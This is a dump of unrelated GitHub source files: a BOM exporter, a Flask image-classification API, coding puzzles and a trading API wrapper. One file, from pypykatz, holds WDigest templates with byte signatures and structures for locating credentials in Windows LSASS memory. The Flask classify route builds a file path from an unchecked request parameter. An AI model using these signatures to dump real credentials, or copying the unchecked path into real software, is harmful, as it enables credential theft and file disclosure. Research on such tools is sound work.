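        refs = [_one_trial.remote(i) for i in range(batch_num * batch_size, (batch_num + 1) * batch_size)]
        results.extend(ray.get(refs))  # blocks until the whole batch finishes
    return results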
+{"seq_id":"9770702714","text":"from bom.program import encompix\nfrom bom.program import data\n\n# from bom.program import meridian\n\nimport pandas as pd\nimport csv\n\n\ndef main(command, assembly, close_file='never', open_model=True,\n recursive=True, output_report=True, output_import=True,\n update_parent_revision=True, update_vendor_id=True):\n \"\"\"Export the BOM from Inventor, Promise or from Cooperation\n\n The current workflow is:\n 1) Inventor/Promise/Cooperation - Create bom, ibom & ebom dataframes\n 2) Meridian - Update drawing revision column\n 3) Encompix - Update parent revision column\n 4) Encompix - Exclude sections with the same revision\n 5) Encompix - Update vendor id column\n 6) Python Core - Save report and import file\n\n Parameters\n ----------\n command : str\n Choose between the 'mechanical', 'electrical' or 'cooperation'\n sub-commands. Extract the bom from the respective program.\n assembly : str\n The assembly number you wish to import eg AGR1338-025-00.\n If None, use the active drawing opened in Inventor instead.\n close_file : str\n Choose whether to close the idw and/or iam file when finished\n (without saving). Choose between ['never', 'iam', 'idw', 'both']\n open_model : bool\n Sometimes descriptions are missing from the parts list. To fix\n this, the assembly model needs to be opened as well.\n update_parent_revision : bool\n Update the assembly revision on the ebom\n update_vendor_id : bool\n Update the vendor id column on the ebom\n recursive : bool\n Include sub assembly BOMs.\n output_report : bool\n Save Report file (partcode.xlsx)\n output_import : bool\n Save Encompix import file (partcode.csv)\n \"\"\"\n\n # 1a) Mechanical BOMs\n if command == 'mechanical':\n app = data.Inventor(\n assembly=assembly,\n close_file=close_file,\n open_model=open_model,\n recursive=recursive\n )\n bom = app.load_bom()\n ibom = app.create_indented_bom(bom)\n ebom = app.create_ebom(bom)\n\n # -------------------------------------------------------------------------\n # TODO - 1b) Electrical BOMs\n # if command == 'electrical':\n # app = data.Promise()\n # bom = app.load_bom()\n # ibom = app.create_indented_bom(bom)\n # ebom = app.create_ebom(bom)\n #\n # TODO - 1c) Cooperation BOMs\n # if command == 'cooperation':\n # app = data.Cooperation()\n # bom = app.load_bom()\n # ibom = app.create_indented_bom(bom)\n # ebom = app.create_ebom(bom)\n #\n # TODO - 2) Meridian - Update drawing revision column\n # if command != 'electrical' and arg.update_drawing:\n # drev = meridian.load_drawing_revision(ebom)\n # ebom = meridian.update_drawing_revision(ebom, drev)\n # -------------------------------------------------------------------------\n\n # 3) Encompix - Update parent revision column\n if update_parent_revision:\n prev = encompix.load_parent_revision(ebom)\n ebom = encompix.update_parent_revision(ebom, prev)\n\n # -------------------------------------------------------------------------\n # TODO - 4) Encompix - Exclude sections with the same revision\n # if arg.exclude_same_revision:\n # ebom = app.encompix.exlude_same_revision(ebom)\n # -------------------------------------------------------------------------\n\n # 5) Encompix - Update vendor id column\n if update_vendor_id:\n vendor = encompix.load_vendor_id()\n ebom = encompix.update_vendor_id(ebom, vendor)\n\n # 6a) Save report file\n if output_report:\n save_report_file(assembly, bom, ibom, ebom, prev)\n\n # 6b) Save Encompix Import csv\n if output_import:\n save_import_file(assembly, ebom)\n\n # -------------------------------------------------------------------------\n # TODO - 6c) Save Encompix Item csv\n # if arg.output_item:\n # save_item_file()\n # -------------------------------------------------------------------------\n\n\ndef save_report_file(assembly, bom, indented_bom, ebom, prev):\n \"\"\"Save Report file as partcode.xlsx\n\n Parameters\n ----------\n assembly : str\n assembly number\n bom : obj\n bom dataframe\n indented_bom : obj\n indented bom dataframe\n ebom : obj\n encompix import bom dataframe\n prev : obj\n parent revision dataframe\n \"\"\"\n writer = pd.ExcelWriter(assembly + '.xlsx', engine='xlsxwriter')\n workbook = writer.book\n header_format = workbook.add_format({\n 'bold': True,\n 'text_wrap': False,\n 'fg_color': '#DCE6F1',\n 'border': 1\n })\n\n _create_bom_worksheet(bom, writer, header_format)\n
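# --- Added aside (not part of the original module): the _create_*_worksheet helpers below all follow the same xlsxwriter pattern -- write the dataframe with header=False and startrow=1, then write the header row by hand so the custom format applies (pandas writes its own header format otherwise). A standalone sketch of the pattern, with an illustrative name:\n def _write_with_header_sketch(df, writer, sheet, fmt):\n df.to_excel(writer, sheet_name=sheet, index=False, header=False, startrow=1)\n ws = writer.sheets[sheet]\n for col_num, value in enumerate(df.columns.values):\n ws.write(0, col_num, value, fmt)\n 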
_create_indented_bom_worksheet(indented_bom, writer, header_format)\n _create_import_file_worksheet(ebom, writer, header_format)\n _create_new_revision_worksheet(prev, writer, header_format)\n\n writer.close()\n\n\ndef _create_bom_worksheet(df, writer, header_format):\n \"\"\"Create and format bom worksheet\n\n Parameters\n ----------\n df : obj\n bom dataframe\n writer : obj\n xlsxwriter object\n header_format : dict\n 1st row header format properties\n \"\"\"\n df.to_excel(\n writer,\n sheet_name='bom',\n index=False,\n header=False,\n startrow=1\n )\n\n worksheet = writer.sheets['bom']\n for col_num, value in enumerate(df.columns.values):\n worksheet.write(0, col_num, value, header_format)\n\n worksheet.set_column(0, 0, 16) # Assembly\n worksheet.set_column(1, 1, 26) # Assembly_Name\n worksheet.set_column(5, 5, 16) # Dwg_No\n worksheet.set_column(6, 6, 34) # Component\n\n\ndef _create_indented_bom_worksheet(df, writer, header_format):\n \"\"\"Create and format indented bom worksheet\n\n Parameters\n ----------\n df : obj\n ibom dataframe\n writer : obj\n xlsxwriter object\n header_format : dict\n 1st row header format properties\n \"\"\"\n df.to_excel(\n writer,\n sheet_name='indented_bom',\n index=False,\n header=False,\n startrow=1,\n )\n\n worksheet = writer.sheets['indented_bom']\n for col_num, value in enumerate(df.columns.values):\n worksheet.write(0, col_num, value, header_format)\n\n worksheet.set_column(2, 2, 21) # Dwg_No\n worksheet.set_column(3, 3, 60) # Component\n\n\ndef _create_new_revision_worksheet(df, writer, header_format):\n \"\"\"Create and encompix new revision worksheet\n\n Parameters\n ----------\n df : obj\n prev dataframe\n writer : obj\n xlsxwriter object\n header_format : dict\n 1st row header format properties\n \"\"\"\n df.to_excel(\n writer,\n sheet_name='new_revision',\n index=False,\n startrow=1,\n header=False\n )\n\n worksheet = writer.sheets['new_revision']\n for col_num, value in enumerate(df.columns.values):\n worksheet.write(0, col_num, value, header_format)\n\n worksheet.set_column(0, 0, 16) # Assembly\n worksheet.set_column(1, 1, 26) # Assembly_Name\n worksheet.set_column(2, 1, 15) # Revision\n\n\ndef _create_import_file_worksheet(df, writer, header_format):\n \"\"\"Create and format encompix import bom worksheet\n\n Parameters\n ----------\n df : obj\n ebom dataframe\n writer : obj\n xlsxwriter object\n header_format : dict\n 1st row header format properties\n \"\"\"\n df.to_excel(\n writer,\n sheet_name='import',\n index=False,\n startrow=1,\n header=False\n )\n\n worksheet = writer.sheets['import']\n for col_num, value in enumerate(df.columns.values):\n worksheet.write(0, col_num, value, header_format)\n\n # worksheet.set_column(0, 0, 16) # Assembly\n # worksheet.set_column(1, 1, 26) # Assembly_Name\n\n\ndef save_import_file(assembly, ebom):\n \"\"\"Save Encompix import file as partcode.csv\n\n Parameters\n ----------\n assembly : str\n assembly number\n ebom : obj\n encompix import bom dataframe\n \"\"\"\n ebom.to_csv(\n assembly + '.csv',\n index=False,\n quoting=csv.QUOTE_NONNUMERIC\n )\n","repo_name":"toptea/ebom","sub_path":"src/bom/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":8054,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8643929026","text":"import te.lang.cce\nfrom te import tvm\nfrom te.platform.fusion_manager import fusion_manager\nfrom topi import generic\nfrom topi.cce import util\nfrom te.utils.op_utils import refine_shapes_for_broadcast\nfrom 
te.utils.op_utils import *\n\n# pylint: disable=locally-disabled,too-many-arguments,unused-argument\n# pylint: disable=too-many-locals,invalid-name\n@fusion_manager.register(\"logical_and\")\ndef logical_and_compute(x1, x2, y, kernel_name=\"logical_and\"):\n \"\"\"\n calculating data\n\n Parameters\n ----------\n x1 : TVM tensor\n the placeholder of x1\n x2: TVM tensor\n the placeholder of x2\n y : dict\n dict of output_y, include keys(shape and dtype)\n kernel_name : str\n kernel name, default value is \"logical_and\"\n\n Returns\n -------\n output tensor\n \"\"\"\n shape_x = te.lang.cce.util.shape_to_list(x1.shape)\n shape_y = te.lang.cce.util.shape_to_list(x2.shape)\n _, _, shape_max = broadcast_shapes(shape_x, shape_y, param_name_input1=\"x1\", param_name_input2=\"x2\")\n\n x1 = te.lang.cce.cast_to(x1, \"float16\")\n x2 = te.lang.cce.cast_to(x2, \"float16\")\n\n data_x = te.lang.cce.broadcast(x1, shape_max)\n data_y = te.lang.cce.broadcast(x2, shape_max)\n\n res = te.lang.cce.vmul(data_x, data_y)\n\n res = te.lang.cce.cast_to(res, \"int8\", True)\n\n return res\n\n\n@check_op_params(REQUIRED_INPUT, REQUIRED_INPUT, REQUIRED_OUTPUT, KERNEL_NAME)\ndef logical_and(x1, x2, y, kernel_name=\"logical_and\"):\n \"\"\"\n calculating data\n\n Parameters\n ----------\n x1 : dict\n shape and dtype of input, only support float16, float32\n x2 : dict\n shape and dtype of input, only support float16, float32\n y : dict\n shape and dtype of output, should be same shape and type as input\n kernel_name : str\n kernel name, default value is \"logical_and\"\n\n Returns\n -------\n None\n \"\"\"\n shape_x = x1.get(\"shape\")\n shape_y = x2.get(\"shape\")\n dtype_x = x1.get(\"dtype\")\n dtype_y = x2.get(\"dtype\")\n\n check_shape(shape_x, param_name=\"x1\")\n check_shape(shape_y, param_name=\"x2\")\n\n if dtype_x != dtype_y:\n raise RuntimeError(\"The type of input must be the same\")\n\n input_data_type = dtype_x.lower()\n check_tuple = (\"int8\",)\n check_dtype(input_data_type, check_tuple, param_name=\"x1\")\n\n shape_x, shape_y, _ = broadcast_shapes(shape_x, shape_y, param_name_input1=\"x1\", param_name_input2=\"x2\")\n shape_x, shape_y = refine_shapes_for_broadcast(shape_x, shape_y)\n data_x = tvm.placeholder(shape_x, dtype=dtype_x, name=\"data_x\")\n data_y = tvm.placeholder(shape_y, dtype=dtype_y, name=\"data_y\")\n\n res = logical_and_compute(data_x, data_y, y, kernel_name)\n\n with tvm.target.cce():\n sch = generic.auto_schedule(res)\n\n config = {\"name\": kernel_name,\n \"tensor_list\": (data_x, data_y, res)}\n\n te.lang.cce.cce_build_code(sch, config)\n","repo_name":"gekowa/ascend-opp","sub_path":"op_impl/built-in/ai_core/tbe/impl/logical_and.py","file_name":"logical_and.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11877669378","text":"\nfrom flask import Blueprint\nfrom flask import jsonify\nfrom flask import request\n\nfrom rest_darknet import load_image_color\nfrom rest_darknet.pydarknet.image import Image, NotAllowedFileException\n\nmodule = Blueprint('api', __name__, url_prefix='/api/v1')\n\nfrom rest_darknet.views.response import *\nfrom rest_darknet.pydarknet.classifier import Classifier\n\nfrom rest_darknet_config import UPLOAD_FOLDER\n\n\n@module.route('/upload_image', methods=['POST'])\ndef upload_image():\n # check if the post request has the file part\n if 'image' not in request.files:\n return jsonify(NO_IMAGE_FOUND.body), NO_IMAGE_FOUND.status_code\n\n file = 
request.files['image']\n # if user does not select file, browser also\n # submit a empty part without filename\n if file.filename == '':\n return jsonify(NO_SELECTED_IMAGE.body), NO_SELECTED_IMAGE.status_code\n if file:\n try:\n img = Image(file)\n except NotAllowedFileException:\n return jsonify(NOT_ALLOWED_FILE.body), NOT_ALLOWED_FILE.status_code\n try:\n filename = img.save_file()\n except FileNotFoundError:\n return jsonify(INTERNAL_SERVER_ERROR.body), INTERNAL_SERVER_ERROR.status_code\n response = SuccessResponse({\"filename\": filename}, \"OK\")\n return jsonify(response.body), response.status_code\n\n\n\n@module.route('/classify', methods=['GET'])\ndef image_classify():\n _limit = 10\n clf = Classifier()\n img_url = request.args.get('img')\n image_instance = load_image_color(UPLOAD_FOLDER + '/{}'.format(img_url))\n if request.args.get('limit'):\n _limit = int(request.args.get('limit'))\n result = {\n \"result\": clf.classify(image_instance)[:_limit]\n }\n return jsonify(result), 200","repo_name":"razeone/flask-darknet","sub_path":"rest_darknet/views/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20123883252","text":"#!/usr/bin/env python3\n#\n# Author:\n# Tamas Jos (@skelsec)\n#\n\n#import io\n#from minidump.win_datatypes import *\nfrom pypykatz.commons.common import KatzSystemArchitecture, WindowsBuild, WindowsMinBuild\nfrom pypykatz.commons.win_datatypes import LUID, ULONG, POINTER\nfrom pypykatz.lsadecryptor.package_commons import PackageTemplate\n\nclass WdigestTemplate(PackageTemplate):\n\tdef __init__(self):\n\t\tsuper().__init__('Wdigest')\n\t\tself.signature = None\n\t\tself.first_entry_offset = None\n\t\tself.list_entry = None\n\t\tself.primary_offset = None\n\t\n\t@staticmethod\n\tdef get_template(sysinfo):\n\t\ttemplate = WdigestTemplate()\n\n\t\tif sysinfo.architecture == KatzSystemArchitecture.X64:\n\t\t\tif WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:\n\t\t\t\ttemplate.signature = b'\\x48\\x3b\\xda\\x74'\n\t\t\t\ttemplate.first_entry_offset = -4\n\t\t\t\ttemplate.primary_offset = 36\n\t\t\t\ttemplate.list_entry = PWdigestListEntry\n\t\t\t\t\n\t\t\telif WindowsMinBuild.WIN_2K3.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:\n\t\t\t\ttemplate.signature = b'\\x48\\x3b\\xda\\x74'\n\t\t\t\ttemplate.first_entry_offset = -4\n\t\t\t\ttemplate.primary_offset = 48\n\t\t\t\ttemplate.list_entry = PWdigestListEntry\n\n\t\t\telif sysinfo.buildnumber >= WindowsMinBuild.WIN_VISTA.value:\n\t\t\t\ttemplate.signature = b'\\x48\\x3b\\xd9\\x74'\n\t\t\t\ttemplate.first_entry_offset = -4\n\t\t\t\ttemplate.primary_offset = 48\n\t\t\t\ttemplate.list_entry = PWdigestListEntry\n\t\t\t\t\n\t\t\telse:\n\t\t\t\traise Exception('Could not identify template! 
Architecture: %s sysinfo.buildnumber: %s' % (sysinfo.architecture, sysinfo.buildnumber))\n\t\t\t\n\t\t\n\t\telif sysinfo.architecture == KatzSystemArchitecture.X86:\n\t\t\tif WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:\n\t\t\t\ttemplate.signature = b'\\x74\\x18\\x8b\\x4d\\x08\\x8b\\x11'\n\t\t\t\ttemplate.first_entry_offset = -6\n\t\t\t\ttemplate.primary_offset = 36\n\t\t\t\ttemplate.list_entry = PWdigestListEntryNT5\n\n\t\t\telif WindowsMinBuild.WIN_2K3.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:\n\t\t\t\ttemplate.signature = b'\\x74\\x18\\x8b\\x4d\\x08\\x8b\\x11'\n\t\t\t\ttemplate.first_entry_offset = -6\n\t\t\t\ttemplate.primary_offset = 28\n\t\t\t\ttemplate.list_entry = PWdigestListEntryNT5\n\t\t\t\t\t\t\t\t\n\t\t\telif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:\n\t\t\t\ttemplate.signature = b'\\x74\\x11\\x8b\\x0b\\x39\\x4e\\x10'\n\t\t\t\ttemplate.first_entry_offset = -6\n\t\t\t\ttemplate.primary_offset = 32\n\t\t\t\ttemplate.list_entry = PWdigestListEntry\n\t\t\t\t\n\t\t\telif WindowsMinBuild.WIN_BLUE.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_10.value:\n\t\t\t\ttemplate.signature = b'\\x74\\x15\\x8b\\x0a\\x39\\x4e\\x10'\n\t\t\t\ttemplate.first_entry_offset = -4\n\t\t\t\ttemplate.primary_offset = 32\n\t\t\t\ttemplate.list_entry = PWdigestListEntry\n\t\t\t\n\t\t\telif WindowsMinBuild.WIN_10.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1809.value:\n\t\t\t\ttemplate.signature = b'\\x74\\x15\\x8b\\x0a\\x39\\x4e\\x10'\n\t\t\t\ttemplate.first_entry_offset = -6\n\t\t\t\ttemplate.primary_offset = 32\n\t\t\t\ttemplate.list_entry = PWdigestListEntry\n\t\t\t\t\n\t\t\telse: # sysinfo.buildnumber >= WindowsBuild.WIN_10_1809:\n\t\t\t\ttemplate.signature = b'\\x74\\x15\\x8b\\x17\\x39\\x56\\x10'\n\t\t\t\ttemplate.first_entry_offset = -6\n\t\t\t\ttemplate.primary_offset = 32\n\t\t\t\ttemplate.list_entry = PWdigestListEntry\n\t\t\n\t\telse:\n\t\t\traise Exception('Unknown architecture! 
%s' % sysinfo.architecture)\n\t\t\n\t\ttemplate.log_template('list_entry', template.list_entry)\n\t\treturn template\n\t\n\nclass PWdigestListEntry(POINTER):\n\tdef __init__(self, reader):\n\t\tsuper().__init__(reader, WdigestListEntry)\n\t\t\nclass PWdigestListEntryNT5(POINTER):\n\tdef __init__(self, reader):\n\t\tsuper().__init__(reader, WdigestListEntryNT5)\n\t\t\nclass WdigestListEntryNT5:\n\tdef __init__(self, reader):\n\t\tself.Flink = PWdigestListEntryNT5(reader)\n\t\tself.Blink = PWdigestListEntryNT5(reader)\n\t\tself.this_entry = PWdigestListEntryNT5(reader)\n\t\tself.usage_count = ULONG(reader)\n\t\treader.align() #8?\n\t\tself.luid = LUID(reader).value\n\n\nclass WdigestListEntry:\n\tdef __init__(self, reader):\n\t\tself.Flink = PWdigestListEntry(reader)\n\t\tself.Blink = PWdigestListEntry(reader)\n\t\tself.usage_count = ULONG(reader)\n\t\treader.align() #8?\n\t\tself.this_entry = PWdigestListEntry(reader)\n\t\tself.luid = LUID(reader).value","repo_name":"skelsec/pypykatz","sub_path":"pypykatz/lsadecryptor/packages/wdigest/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":4154,"program_lang":"python","lang":"en","doc_type":"code","stars":2505,"dataset":"github-code","pt":"53"} +{"seq_id":"13179653632","text":"def main():\n with open(\"./test_input.txt\", \"r\") as file:\n crabs = [int(x) for x in file.readline().split(\",\")]\n\n least_fuel = None\n for position in range(0, max(crabs) + 1):\n current_fuel = 0\n for i in crabs:\n current_fuel += abs(i - position)\n if least_fuel == None or current_fuel < least_fuel:\n least_fuel = current_fuel\n print(least_fuel)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"anacantanhede/advent_of_code_2021","sub_path":"source/exercise_7/swarm_1.py","file_name":"swarm_1.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38903615179","text":"\r\nclass Graph:\r\n def __init__(self, edges):\r\n \r\n self.adjList = {}\r\n \r\n for (src, dest, weight) in edges:\r\n if src in self.adjList:\r\n self.adjList[src].append((dest, weight))\r\n else:\r\n self.adjList[src] = [(dest, weight)]\r\n \r\n # print(\"Graph:\", self.adjList)\r\n\r\n def distanceOfRoute(self, routes):\r\n if(self.isRouteExists(routes) == False):\r\n return 'NO SUCH ROUTE'\r\n\r\n distance = 0\r\n routes = list(routes)\r\n length = len(routes)\r\n for vertex in range(length-1):\r\n src = routes[vertex]\r\n end = routes[vertex+1]\r\n edge = self.adjList.get(src)\r\n for e in edge:\r\n if(e[0] == end):\r\n distance += e[1]\r\n\r\n return distance\r\n\r\n def numberOfRoutesWithDistanceLess(self, src, end, maxDistance=30):\r\n noOfRoutes = 0\r\n \r\n nodes = self.adjList.get(src)\r\n newPaths = []\r\n for node in nodes:\r\n paths = self.getPaths(node[0], end)\r\n for path in paths:\r\n path = [src] + path\r\n newPaths.append(path)\r\n \r\n distances = []\r\n for paths in newPaths:\r\n distances.append(self.distanceOfRoute(\"\".join(paths)))\r\n\r\n noOfRoutes = 0\r\n for d1 in distances:\r\n if(d1 < maxDistance):\r\n noOfRoutes += 1\r\n for d2 in distances:\r\n if(d1+d2 < maxDistance):\r\n noOfRoutes += 1\r\n\r\n\r\n for d1 in distances:\r\n sum = d1 + d1 + d1\r\n while(sum < maxDistance):\r\n noOfRoutes += 1\r\n sum += d1\r\n\r\n return noOfRoutes\r\n\r\n def isRouteExists(self, routes):\r\n routes = list(routes)\r\n length = len(routes)\r\n for vertex in range(length-1):\r\n src = routes[vertex]\r\n end = routes[vertex+1]\r\n edge = 
self.adjList.get(src)\r\n valid = False\r\n for e in edge:\r\n if(e[0] == end):\r\n valid = True\r\n if(valid == False):\r\n return False\r\n\r\n return True\r\n\r\n def getPaths(self, src, end, path=[]):\r\n path = path + [src]\r\n\r\n if src == end:\r\n return [path]\r\n\r\n if src not in self.adjList:\r\n return []\r\n\r\n paths = []\r\n\r\n for node in self.adjList[src]:\r\n if node[0] not in path:\r\n newPaths = self.getPaths(node[0], end, path)\r\n for p in newPaths:\r\n paths.append(p)\r\n\r\n return paths\r\n \r\n def getPathsExactLength(self, src, end, path=[], steps=0):\r\n path = path + [src]\r\n\r\n if (src == end and steps == 4):\r\n return [path]\r\n\r\n if(steps > 4):\r\n return []\r\n\r\n if src not in self.adjList:\r\n return []\r\n\r\n paths = []\r\n\r\n for node in self.adjList[src]:\r\n newPaths = self.getPathsExactLength(node[0], end, path, steps+1)\r\n for p in newPaths:\r\n paths.append(p)\r\n\r\n return paths\r\n \r\n \r\n\r\n def numberOfTripsWithMaximumSteps(self, src, end, maxSteps):\r\n noOfTrips = 0\r\n nodes = self.adjList.get(src)\r\n trips = []\r\n\r\n for n in nodes:\r\n trips.append(self.getPaths(n[0], end))\r\n\r\n for trip in trips:\r\n for t in trip:\r\n if(len(t) <= maxSteps):\r\n noOfTrips += 1\r\n\r\n return noOfTrips\r\n\r\n def numberOfTripsWithExactlySteps(self, src, end, exactSteps):\r\n\r\n paths = self.getPathsExactLength(src, end)\r\n\r\n return len(paths)\r\n\r\n def shortestRouteLength(self, src, end):\r\n \r\n path = self.BFS_SP(src, end)\r\n distance = 0\r\n length = len(path)\r\n for vertex in range(length-1):\r\n src = path[vertex]\r\n end = path[vertex+1]\r\n edge = self.adjList.get(src)\r\n for e in edge:\r\n if(e[0] == end):\r\n distance += e[1]\r\n\r\n return distance\r\n\r\n def BFS_SP(self, start, end):\r\n explored = []\r\n queue = [[start]]\r\n \r\n while queue:\r\n path = queue.pop(0)\r\n node = path[-1]\r\n \r\n if node not in explored:\r\n neighbours = self.adjList[node]\r\n \r\n for neighbour in neighbours:\r\n new_path = list(path)\r\n new_path.append(neighbour[0])\r\n queue.append(new_path)\r\n \r\n if neighbour[0] == end:\r\n return new_path\r\n\r\n explored.append(node)\r\n \r\n return\r\n \r\n \r\nif __name__ == '__main__':\r\n \r\n # Graph: AB5, BC4, CD8, DC8, DE6, AD5, CE2, EB3, AE7\r\n edges = [\r\n ('A', 'B', 5),\r\n ('B', 'C', 4),\r\n ('C', 'D', 8),\r\n ('D', 'C', 8),\r\n ('D', 'E', 6),\r\n ('A', 'D', 5),\r\n ('C', 'E', 2),\r\n ('E', 'B', 3),\r\n ('A', 'E', 7)\r\n ]\r\n \r\n graph = Graph(edges)\r\n\r\n \r\n distance = graph.distanceOfRoute('ABC')\r\n print(f\"Output #1: {distance}\")\r\n\r\n distance = graph.distanceOfRoute('AD')\r\n print(f\"Output #2: {distance}\")\r\n\r\n distance = graph.distanceOfRoute('ADC')\r\n print(f\"Output #3: {distance}\")\r\n\r\n distance = graph.distanceOfRoute('AEBCD')\r\n print(f\"Output #4: {distance}\")\r\n\r\n distance = graph.distanceOfRoute('AED')\r\n print(f\"Output #5: {distance}\")\r\n\r\n numOfTrips = graph.numberOfTripsWithMaximumSteps('C', 'C', 3)\r\n print(f\"Output #6: {numOfTrips}\")\r\n\r\n numOfTrips = graph.numberOfTripsWithExactlySteps('A', 'C', 4)\r\n print(f\"Output #7: {numOfTrips}\")\r\n\r\n distance = graph.shortestRouteLength('A','C')\r\n print(f\"Output #8: {distance}\")\r\n\r\n distance = graph.shortestRouteLength('B','B')\r\n print(f\"Output #9: {distance}\")\r\n\r\n routes = graph.numberOfRoutesWithDistanceLess('C','C', 30)\r\n print(f\"Output #10: 
{routes}\")\r\n","repo_name":"nellybella/Take-Home-Assignment","sub_path":"Trains.py","file_name":"Trains.py","file_ext":"py","file_size_in_byte":6151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31349974172","text":"import json\r\nj=json.load(open('cat.json'))\r\nprint(j['data'].keys())\r\nans={}\r\nfor i,(name,value) in enumerate(j['data'].items()):\r\n newname=f'category {i}'\r\n print(newname,name)\r\n ans[newname]=value\r\nans2={'data':ans}\r\n\r\nopen('cat_anon.json','w').write(json.dumps({'data':ans},indent=4))","repo_name":"yigalirani/chart","sub_path":"anon.py","file_name":"anon.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10740708703","text":"class Solution:\n def merge(self, intervals: List[List[int]]) -> List[List[int]]:\n intervals.sort(key=lambda x:x[0])\n print(intervals)\n res = [intervals[0]]\n for i in intervals[1:]:\n v = res[-1]\n if i[0] <= v[1]:\n res.pop()\n i\n res.append([min(i[0],v[0]),max(v[1],i[1])])\n else:\n res.append(i)\n print(res)\n return res\n ","repo_name":"princeamitlali/leet_code","sub_path":"0056-merge-intervals/0056-merge-intervals.py","file_name":"0056-merge-intervals.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42977431924","text":"# coidng=utf-8\nimport requests,json,urllib3\nfrom urllib3.exceptions import InsecureRequestWarning,InsecurePlatformWarning\nclass reqs(object):\n def __init__(self,url, pram, fangshi):\n self.url = url\n self.pram = pram\n self.fangshi = fangshi\n\n def testapi(self):\n if self.fangshi == \"POST\":\n self.pram = json.loads(self.pram)\n urllib3.disable_warnings(InsecureRequestWarning)\n r = requests.post(self.url,json=self.pram,verify=False)\n json_response = json.loads(r.text)\n code = json_response[\"code\"]\n return code, json_response\n\nif __name__==\"__main__\":\n a=reqs(\"https://sports-qa.lifesense.com/sms_service/verify/send_code_v3?requestId=1000&sessionId=nosession\",'{\"code\":\"0zys\",\"mobile\":\"13662673020\"}','POST')\n print(a.testapi())\n\n","repo_name":"qinghuanhuana/pydj","sub_path":"denglu/Fzqingqiu.py","file_name":"Fzqingqiu.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28694478761","text":"# type: ignore\n\"\"\"Base class for trading APIs.\"\"\"\nimport collections\nfrom typing import Any, Dict, List\n\nimport ib_insync as ibin\n\n\nclass IbApi:\n \"\"\"Class for interactive broker API.\n\n This class use the package ib-insync for making asynchronous requests toward\n interactive broker trading work station (TWS) api.\n For reference of TWS, please see :\n https://interactivebrokers.github.io/tws-api/index.html\n and for ib-insync\n https://rawgit.com/erdewit/ib_insync/master/docs/html/readme.html\n \"\"\"\n\n def __init__(self) -> None:\n \"\"\"Class initialization function.\"\"\"\n self.ib = ibin.ib.IB()\n self.ib.connect(\"127.0.0.1\", 4002, clientId=13) # Ports\n\n def get_account(self, **kwargs: Any) -> Dict:\n \"\"\"Get the accounts associated with login.\"\"\"\n accounts_summaries = self.ib.accountSummary()\n\n account = {}\n for account_summary in accounts_summaries:\n if account_summary.account != \"ALL\":\n tag = account_summary.tag\n value = account_summary.value\n account[tag] = value\n\n 
self.account = account\n\n return account\n\n def submit_order(\n self,\n symbol: str,\n qty: int,\n side: str,\n type: str,\n limit_price: float = None,\n stop_price: float = None,\n **kwargs: Any\n ) -> Dict:\n \"\"\"Create and submit an order.\n\n Args:\n symbol: symbol or asset ID\n qty: quantity of shares to be bought or sold\n side: order side, can be \"SELL\" or \"BUY\"\n type: order type, can be one of \"MKT\" (Market), \"LMT\" (Limit),\n \"STP\" (Stop) or \"STP_LIMIT\" (stop limit)\n limit_price: the limit price\n stop_price: the stop price\n **kwargs: Arbitrary keyword arguments, among them for instance:\n currency (str = \"USD\"): the currency in which to place the order\n\n Returns:\n Dict: A list containing the order, based of trade object.\n \"\"\"\n # Initialize default kwargs if necessary\n if \"currency\" not in kwargs:\n currency = \"USD\"\n else:\n currency = kwargs[\"currency\"]\n\n # Define order according to dict\n order_dict = {\n \"STP LMT\": {\n \"orderType\": type,\n \"totalQuantity\": qty,\n \"auxPrice\": stop_price,\n \"lmtPrice\": limit_price,\n \"action\": side,\n },\n \"STP\": {\n \"orderType\": type,\n \"totalQuantity\": qty,\n \"auxPrice\": stop_price,\n \"action\": side,\n },\n \"LMT\": {\n \"orderType\": type,\n \"totalQuantity\": qty,\n \"lmtPrice\": limit_price,\n \"action\": side,\n },\n \"MKT\": {\"orderType\": type, \"totalQuantity\": qty, \"action\": side},\n }\n order_definition = collections.OrderedDict(order_dict[type]) # mypy workaround\n\n order = ibin.Order(**order_definition) # Place order\n\n # Define contract (which asset being traded)\n contract = ibin.Stock(symbol=symbol, exchange=\"SMART\", currency=currency)\n\n # Place order, send request\n trade = self.ib.placeOrder(contract=contract, order=order)\n\n # Confirm submission\n self.ib.sleep(2)\n assert order in self.ib.orders()\n\n trade_dict = trade.__dict__\n\n return trade_dict\n\n def list_orders(self, **kwargs: Any) -> List[Dict]:\n \"\"\"Get a list with all orders.\"\"\"\n open_orders_dict = [x.__dict__ for x in self.ib.reqAllOpenOrders()]\n\n return open_orders_dict\n\n def get_order(self, order_id: str, **kwargs: Any) -> Dict:\n \"\"\"Get an order with specific order_id.\"\"\"\n open_orders = self.ib.reqAllOpenOrders()\n for order in open_orders:\n if order.permId == int(order_id): # Order id is 